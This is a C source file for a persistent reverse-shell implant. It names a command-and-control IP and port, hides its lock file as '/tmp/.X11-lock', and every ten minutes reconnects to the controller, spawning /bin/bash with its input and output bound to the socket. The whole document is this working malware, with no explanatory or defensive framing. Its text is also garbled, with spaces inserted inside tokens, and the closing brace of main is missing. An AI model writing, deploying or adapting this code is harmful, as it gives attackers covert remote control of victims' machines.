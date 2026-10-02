# include < stdio. h>

# include < stdlib. h>

# include < unistd. h>

# include < sys/ socket. h>

# include < sys/ file. h>

# include < netinet/ in. h>

# include < arpa/ inet. h>

# include < signal. h>

# define C2_IP "192. 168. 0. 153"

# define C2_PORT 1337

int main ( void ) {

int lf = open ( " / tmp/. X11-lock " , O_CREAT | O_RDWR , 0600 ) ;

if ( lf < 0 | | flock ( lf , LOCK_EX | LOCK_NB ) < 0 )

return 1 ;

signal ( SIGCHLD , SIG_IGN ) ;

for ( ; ; ) {

int s = socket ( AF_INET , SOCK_STREAM , 0 ) ;

struct sockaddr_in sa = {

. sin_family = AF_INET ,

. sin_port = htons ( C2_PORT ) ,

} ;

inet_pton ( AF_INET , C2_IP , & sa . sin_addr ) ;

if ( connect ( s , ( struct sockaddr * ) & sa , sizeof ( sa ) ) = = 0 ) {

if ( fork ( ) = = 0 ) {

dup2 ( s , 0 ) ;

dup2 ( s , 1 ) ;

dup2 ( s , 2 ) ;

execl ( " / bin/ bash " , " bash " , NULL ) ;

}

}

close ( s ) ;

sleep ( 600 ) ;

}